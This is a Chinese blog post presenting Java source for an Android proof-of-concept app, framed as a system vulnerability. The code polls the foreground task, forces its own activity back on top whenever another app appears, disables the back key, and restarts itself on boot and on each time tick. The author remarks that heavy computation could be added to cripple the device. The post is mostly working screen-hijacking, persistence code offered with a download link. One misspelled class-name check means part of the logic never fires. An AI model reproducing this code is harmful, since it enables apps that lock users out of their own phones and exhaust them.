android系统漏洞

最新推荐文章于 2023-07-07 16:11:19 发布

置顶源代码科技

最新推荐文章于 2023-07-07 16:11:19 发布

阅读量2k

点赞数

分类专栏： android 基础技术总结文章标签： csdn博客 broadcastreceiver android exception 漏洞

本文链接：https://blog.csdn.net/tangnengwu/article/details/23249819

版权

android 基础技术总结专栏收录该内容

38 篇文章 0 订阅

订阅专栏

android允许用户查看当前栈中的任务，我认为这样不安全。

Main.java

package com.example.runback;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningServiceInfo;

import android.content.Context;
import android.content.Intent;

import android.net.Uri;
import android.os.Bundle;

import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.TextView;

public class Main extends Activity
{
	private  static Context context=null;
	public static boolean isServiceRunning = false; 
	
	private RunBackBroadcastReceiver receiver=null;
	public void onCreate(Bundle savedInstanceState) 
	{
		super.onCreate(savedInstanceState);
		context=this;
		setContentView(R.layout.activity_main);
	
	    if (!isServiceRunning) 
	    { 
	    	Intent mIntent = new Intent(context, MyService.class); 
	        context.startService(mIntent); 
	    } 
	    //查看service是否启动
	    ActivityManager manager = (ActivityManager)getSystemService(Context.ACTIVITY_SERVICE); 
	    for (RunningServiceInfo service :manager.getRunningServices(Integer.MAX_VALUE)) 
	    { 
	    	if("com.exanple.runback.MyService".equals(service.service.getClassName()))
	    	{ 
	    		isServiceRunning = true; 
	    		Log.i("my", "com.exanple.runback.MyService is running");
	    	} 
	    } 
	};
	public static Context getContext()
	{
		return context;
	}
	
	//屏蔽返回键
	@Override
	public void onBackPressed() {
		// TODO Auto-generated method stub
		//super.onBackPressed();
	}
	
	@Override
	protected void onDestroy() {
		// TODO Auto-generated method stub
		unregisterReceiver(receiver);
		super.onDestroy();
	}
	

}

Service.java

package com.example.runback;

import java.util.List;

import android.os.Bundle;
import android.os.IBinder;
import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningTaskInfo;
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.util.Log;
import android.view.Menu;

public class MyService extends Service implements Runnable{

	@Override
	public IBinder onBind(Intent intent) {
		// TODO Auto-generated method stub
		return null;
	}
	
	@Override
	public void onCreate() {
		// TODO Auto-generated method stub
		//启动线程
		new Thread(this).start();
		
		super.onCreate();
	}
	
	@Override
	public void onDestroy() {
		// TODO Auto-generated method stub
		super.onDestroy();
	}

	@Override
	public void run() 
	{
		// TODO Auto-generated method stub
		while(true)
		{
			try {
				toTopActivity(Main.getContext());
				getActivityCount(Main.getContext());
				Thread.sleep(100);
			} catch (Exception e) {
				// TODO: handle exception
			}
			
		}
	}
	/**
	 * 检测到当前栈顶不是本程序或者Launcher
	 * 的时候就发广播启动本程序
	 * 由于activity采用的android:launchMode="singleTask"
	 * 当使用Intent启动时会销毁排在本activity之前的activity
	 * 以将本程序的内容显示在屏幕
	 * @param context
	 */
	private void toTopActivity(Context context)
	{
	     ActivityManager manager = (ActivityManager)context.getSystemService(ACTIVITY_SERVICE) ;
	     List<RunningTaskInfo> runningTaskInfos = manager.getRunningTasks(1) ;
	     if(runningTaskInfos != null)
	     {
	    	 if(runningTaskInfos.get(0).topActivity.getClassName().equals("com.android.launcher2.Launcher")||
	    			 runningTaskInfos.get(0).topActivity.getClassName().equals("com.example.runback.Main"))
	    	 {
	    		 Log.i("my", "Launcher or this  do nothing");
	    		 Log.i("my", runningTaskInfos.get(0).topActivity.getClassName());
	    	 }
	    	 else
	    	 {//在这里加入大数据运算，就危险了
                         Log.i("my", runningTaskInfos.get(0).topActivity.getClassName());
	    		 Intent intent =new Intent("com.example.start");
	    		 Log.i("my", "sendBroadcast--->com.example.start");
	    		 sendBroadcast(intent);

	    	 }
	     }
	}
	
	private int getActivityCount(Context context)
	{
		int count=0;
		ActivityManager manager = (ActivityManager)context.getSystemService(ACTIVITY_SERVICE) ;
	    List<RunningTaskInfo> runningTaskInfos = manager.getRunningTasks(Integer.MAX_VALUE) ;
	    for(RunningTaskInfo info : runningTaskInfos)
	    {
	    	if(info.baseActivity.getClassName().equals("com.example.runback.Main"))
	    	{
	    		count++;
	    	}
	    }
	    Log.i("my", "Activity  count :" +count);
	    return count;
	}
}

RunBackBroadcastReceiver.java

package com.example.runback;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;

public class RunBackBroadcastReceiver extends BroadcastReceiver
{
		@Override
		public void onReceive(final Context context, Intent intent) 
		{
			// TODO Auto-generated method stub
			//开机广播
			if(intent.getAction().equals(Intent.ACTION_BOOT_COMPLETED))
			{
				Log.i("my", "ACTION_BOOT_COMPLETED");
				Intent mIntent = new Intent(context, MyService.class); 
			    context.startService(mIntent); 
			}
			//系统每隔一段时间发送这个广播
			//当service被杀死的时候，隔一段时间通过广播启动
			else if(intent.getAction().equals(Intent.ACTION_TIME_TICK))
			{
				Log.i("my", "ACTION_TIME_TICK");
			    
			    if (!Main.isServiceRunning) 
			    { 
			    	Intent mIntent = new Intent(context, MyService.class); 
			        context.startService(mIntent); 
			    } 
			}
			else if(intent.getAction().equals("com.example.start"))
			{
				 Intent mIntent =new Intent();
				 mIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
				 mIntent.setClass(context, Main.class);
				 context.startActivity(mIntent);
				 Log.i("my", "RunBackBroadcastReceiver--->onReceive");
			}
		}
}

很容易通过这种方式劫持屏幕，也可以加入大数据运算，拖跨系统。

可运行代码：http://download.csdn.net/detail/tangnengwu/7166699